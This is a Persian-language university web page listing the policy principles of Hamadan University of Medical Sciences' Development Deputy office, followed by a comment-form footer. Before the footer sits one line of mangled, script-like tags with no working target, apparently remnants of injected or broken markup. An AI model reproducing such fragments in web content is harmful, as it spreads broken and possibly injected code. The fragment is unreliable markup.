Y

معاونت توسعه  دانشگاه علوم پزشکی و خدمات بهداشتی درمانی استان همدان ، مسئولیت پشتیبانی مالی و عملیاتی از تصمیمات اتخاذ شده دانشگاه و مدیریت بهینه منابع انسانی، مالی، فیزیکی را در جهت حفظ و تامین سلامت مردم استان و ارتقا سطح خدمات بهداشتی ،درمانی، آموزشی و پژوهشی در چارچوب قوانین و مقررات مصوب و در حدود وظایف و اختیارات تعیین شده بر عهده دارد.

رئوس خط مشی این معاونت مبتنی براستاندارد مدیریت کیفیت و با اعتقاد به مدیریت علمی در جهت حصول به توسعه پایدار عبارتند از:

  • تقویت و ارتقای کمی و کیفی منابع انسانی به عنوان با ارزش ترین سرمایه های سازمان با بهره گیری از سیستم های انگیزشی و آموزشی پویا و ارج نهادن به خدمات ایشان.
  • بهبود مستمر فرایندها و فعالیتهای سازمان در راستای افزایش رضایتمندی مشتریان( داخلی و خارجی)
  • ترویج و کاربست نتایج پژوهشها و تحقیقات در زمینه مدیریت بهینه سازمان
  • رعایت کامل قوانین و مقررات موجود و اجرای مناسب مصوبات و سیاستهای مدون دانشگاه
  • تسریع در پردازش اطلاعات با بکارگیری فنآوری روز به منظور اصلاح  فرایند های تصمیم ساز سازمان و اتخاذ سیاستهای مبتنی بر شواهد
  • جلب مشارکت و همکاری تمامی مدیران و کارکنان دانشگاه در راستای اهداف کلان سازمان
  • افزایش بهره وری سازمان از طریق مدیریت بهینه منابع موجود و ارتقاء تکنولوژی و سرمایه های انسانی
  • ارتقای مدیریت مشارکتی ، تمرکز زدایی و تفویض اختیار به واحدهای تابعه دانشگاه

 <2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *